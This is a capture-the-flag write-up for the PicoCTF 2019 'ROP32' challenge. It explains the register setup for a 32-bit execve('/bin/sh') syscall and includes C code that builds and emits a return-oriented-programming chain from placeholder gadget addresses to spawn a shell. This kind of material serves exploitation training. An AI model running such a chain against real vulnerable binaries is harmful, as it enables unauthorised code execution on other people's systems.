ROP32 — PicoCTF2019




### Gathering

  • eax == 0xb (11 in decimal): the execve syscall number on 32-bit x86
  • ebx == address in memory of the string '/bin/sh' (the filename argument)
  • ecx == pointer to an argv array whose first entry is the address of '/bin/sh' and whose second entry is NULL
  • edx == NULL (\x00), i.e. an empty envp


  • First, find all the gadgets needed to trigger the syscall; with those in hand, the solve breaks down into five steps.
  • Step 1 — Write-what-where gadgets: a store primitive (for example pop edx / pop eax / mov [edx], eax) to place '/bin/sh' and its argv array in writable memory
  • Step 2 — Init syscall number gadgets: set eax = 0xb (after the writes, since the store primitive clobbers eax)
  • Step 3 — Init syscall argument gadgets: load ebx, ecx and edx as listed in Gathering
  • Step 4 — Syscall gadget: int 0x80
  • Step 5 — Build the ROP chain: padding up to the saved return address, then the gadgets and their operands in order
  • I'm using the following gadgets to write it:
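The five steps above, carried through as an added worked example (this is not the author's chain or code from the writeup; the gadget addresses, the scratch address in .bss and the 28-byte padding to the saved EIP are assumed placeholders that must be replaced with values from the real ROP32 binary, e.g. found with ROPgadget or ropper):

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ASSUMED placeholder gadget addresses, not taken from the real ROP32 binary.
 * For an actual solve, pull them from the target with ROPgadget or ropper;
 * only the shape of each gadget (what it pops / stores) matters here. */
#define G_POP_EAX_RET          0x0809ab01u /* pop eax ; ret */
#define G_POP_EDX_RET          0x0806ed0au /* pop edx ; ret */
#define G_POP_ECX_POP_EBX_RET  0x080de74bu /* pop ecx ; pop ebx ; ret */
#define G_MOV_PEDX_EAX_RET     0x08056e8cu /* mov dword ptr [edx], eax ; ret */
#define G_INT80                0x08049773u /* int 0x80 */
#define SCRATCH_ADDR           0x080eb000u /* ASSUMED unused writable .bss address */
#define SYS_EXECVE_I386        0x0bu       /* execve on 32-bit x86 */
#define PAD_TO_RET             28u         /* ASSUMED bytes from buffer start to saved EIP */

typedef struct { uint8_t buf[1024]; size_t len; } chain_t;

/* Append one dword little-endian, the byte order the x86 stack expects. */
static void push32(chain_t *c, uint32_t v)
{
    if (c->len + 4 > sizeof c->buf) return;
    for (int i = 0; i < 4; i++) c->buf[c->len++] = (uint8_t)(v >> (8 * i));
}

/* Read the n-th dword back (for checking the chain before sending it). */
static uint32_t dword_at(const chain_t *c, size_t n)
{
    uint32_t v = 0;
    if (n * 4 + 4 > c->len) return 0;
    for (int i = 0; i < 4; i++) v |= (uint32_t)c->buf[n * 4 + i] << (8 * i);
    return v;
}

/* Step 1 primitive: store one dword at an arbitrary address.
 * Stack: pop edx ; ret <- where | pop eax ; ret <- what | mov [edx], eax ; ret */
static void write_dword(chain_t *c, uint32_t where, uint32_t what)
{
    push32(c, G_POP_EDX_RET);     push32(c, where);
    push32(c, G_POP_EAX_RET);     push32(c, what);
    push32(c, G_MOV_PEDX_EAX_RET);
}

/* Write a NUL-terminated string 4 bytes at a time; returns dwords written. */
static size_t write_string(chain_t *c, uint32_t where, const char *s)
{
    size_t n = strlen(s) + 1, words = (n + 3) / 4;
    for (size_t i = 0; i < words; i++) {
        uint32_t w = 0;
        for (size_t k = 0; k < 4 && i * 4 + k < n; k++)
            w |= (uint32_t)(uint8_t)s[i * 4 + k] << (8 * k);
        write_dword(c, where + (uint32_t)(i * 4), w);
    }
    return words;
}

/* Steps 1-4: lay out "/bin/sh" and argv in memory, load the registers
 * from the Gathering section, then trap into the kernel. */
static void build_execve_chain(chain_t *c)
{
    const uint32_t binsh = SCRATCH_ADDR;
    c->len = 0;

    /* Step 1: "/bin/sh\0" followed by argv = { &"/bin/sh", NULL } */
    uint32_t argv = binsh + (uint32_t)(4 * write_string(c, binsh, "/bin/sh"));
    write_dword(c, argv, binsh);   /* argv[0] = &"/bin/sh" */
    write_dword(c, argv + 4, 0);   /* argv[1] = NULL terminator */

    /* Step 2: eax = 11. Must come after the writes, which clobber eax. */
    push32(c, G_POP_EAX_RET);         push32(c, SYS_EXECVE_I386);

    /* Step 3: ebx = &"/bin/sh", ecx = argv, edx = NULL.
     * The only ecx gadget also pops ebx, so ecx's value goes first. */
    push32(c, G_POP_ECX_POP_EBX_RET); push32(c, argv); push32(c, binsh);
    push32(c, G_POP_EDX_RET);         push32(c, 0);

    /* Step 4: int 0x80 */
    push32(c, G_INT80);
}

/* Small accessors so the finished chain can be checked by dword index. */
static size_t execve_chain_len(void)
{
    chain_t c; build_execve_chain(&c); return c.len;
}
static uint32_t execve_chain_dword(size_t n)
{
    chain_t c; build_execve_chain(&c); return dword_at(&c, n);
}

/* Step 5: emit padding + chain as raw bytes, e.g. ./build > payload */
int main(void)
{
    chain_t c;
    build_execve_chain(&c);
    for (unsigned i = 0; i < PAD_TO_RET; i++) putchar('A');
    fwrite(c.buf, 1, c.len, stdout);
    return 0;
}
```

The ordering is the part worth checking against your own gadget list: every store round trip goes through eax, so the syscall number has to be loaded after the last write, and a combined gadget such as pop ecx ; pop ebx ; ret fixes the order of the two operands on the stack. If the target's writable address or the chain itself contains a byte the input routine stops on (a newline for gets, a NUL for strcpy), pick a different scratch address or gadget.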




Nguyễn Tín